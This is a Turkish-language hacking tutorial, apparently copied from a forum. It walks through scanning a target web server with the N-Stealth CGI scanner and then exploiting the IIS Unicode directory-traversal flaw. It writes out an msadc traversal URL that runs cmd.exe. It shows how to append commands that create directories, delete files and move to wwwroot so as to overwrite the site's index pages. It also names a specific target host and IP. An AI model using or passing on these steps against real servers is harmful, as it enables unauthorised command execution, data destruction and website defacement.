Cgi ve Uni Cod Açiklarindan en iyi Seklilde Faydalanmak için Scanner&l8217;inizin iyi Olmasi Gerek.
Yoksa Piyasada Bir çok cgi scan var, Zamaninda Hepside çok iyi di. Veritabanlarını Güncelleştirmeyen Scannerlar yeni açıklar karşında hiçte etkili olmayacaktır.
ve Açik Olmadigi Halde Basit Bir Logi Sayfasi Hakkinda açik var diye uyari Veriyorlar.
Tüm
Su An Piyasadaki En iyi Cgi Sanner N-Stealth (iP Portal Download Bölümden indirebilirsiniz)
Program Güzel Oldugu Kadar Türkçe Dil Destegininde Bulunmasi Arti Bir Özellik.
Simdi Adim Adim Bir Sisteme UniCod Açiklari Sayesinde Sizmayi Görecegiz.
Programi Kurduktan Sonra Dil Seçenekleri Çikacak Karsiniza Ordan Türkçeyi Seçin
Sunucu iP Adresi : Buraya Saldiracagimiz Hedef Sitenin ip Adresini Yaziyoruz.
(ip Adresini ögrenmek için siteye ping atin yeter c:>ping -t gibi illegalport.com ip adresi 66.111.48.66 )
ip Adresini Yazdiktan Sonra Tara Tusuna tiklamaniz yada Enter&l8217;a Basmaniz Yeterli.
Baglanti Hiziniza Bagli Olarak islem Biraz Sürecektir. (öneri olarak: önce Local Network&l8217;ünüzde Deneyebilirsiniz.
Tabiki Networkünüzdeki (Saldiracaginiz Makinada) Web Server Kurulu Olmali.
Bu Sekilde Sistemin isleyisini çok daha hizli görebilirsiniz.)
N-Stealth Bir Açik Buldugu Anda üstteki Gibi Muhtemel Yazlim Hatasi Bulundu diye bir uyari verecektir.
Hemen Sag Taraftaki Yeri Butonuna Tiklayarak Açigi Görebilirsiniz. Ama En iyisi Sonuna Kadar Beklemek.
Tarama Islemi Bittiginde Sistem Otomatik Olarak Size Html Formatinda Rapor Olusturacaktir.
Bu Raporun örnegini asagida görebilirsiniz.
Raporu html olarak Kaydedin.
Rapor Türkçedir ve Sistemdeki Açiklari, Risk Seviyelerini Size Gösterecektir.
ve html dosyasindan Direkt Çalistirabilmeniz için Hazir Linkler Olusturacaktir.
html olarak internet Explorer&l8217;dan oldugu gibi. Direk Program üzerinden de
bu açiklari Açik Butonuna Tiklayarak çalistirabilirsiniz.
Simdi En Can Alici Nokta : color=l000000http://10.0.0.8/msadc/..%c0%af..%c0%...../winnt/syste m32/cmd.exe?/c+dir+c:
(Bu Açiga Ait Bir Link)
Link in Sonunda +dir+c: bölümü var bütün is burda. dir yazan yere cdm.exe nin çalistirdigi tüm komutlari yazabilirsiniz.
Mesela Dizin Olusturmak için +md+c:dizinAdi
Dosya Silmek için +del+c:dosya adi
Diznler Arasi Geçis için Bildigimiz cd Komutunu kullanabiliriz +cd+c:Inetpubwwroot
wwroot a ulastikdan sonra index.htm - index.asp ye istediginizi yapin.
iste Örnek Bir N-Stealth Raporu
Default Kurulan Tüm IIS&l8217;lerde Bu Açiklar Var.
Raporda Risk Seviyeleri Belirtilmistir.
***Alıntıdır***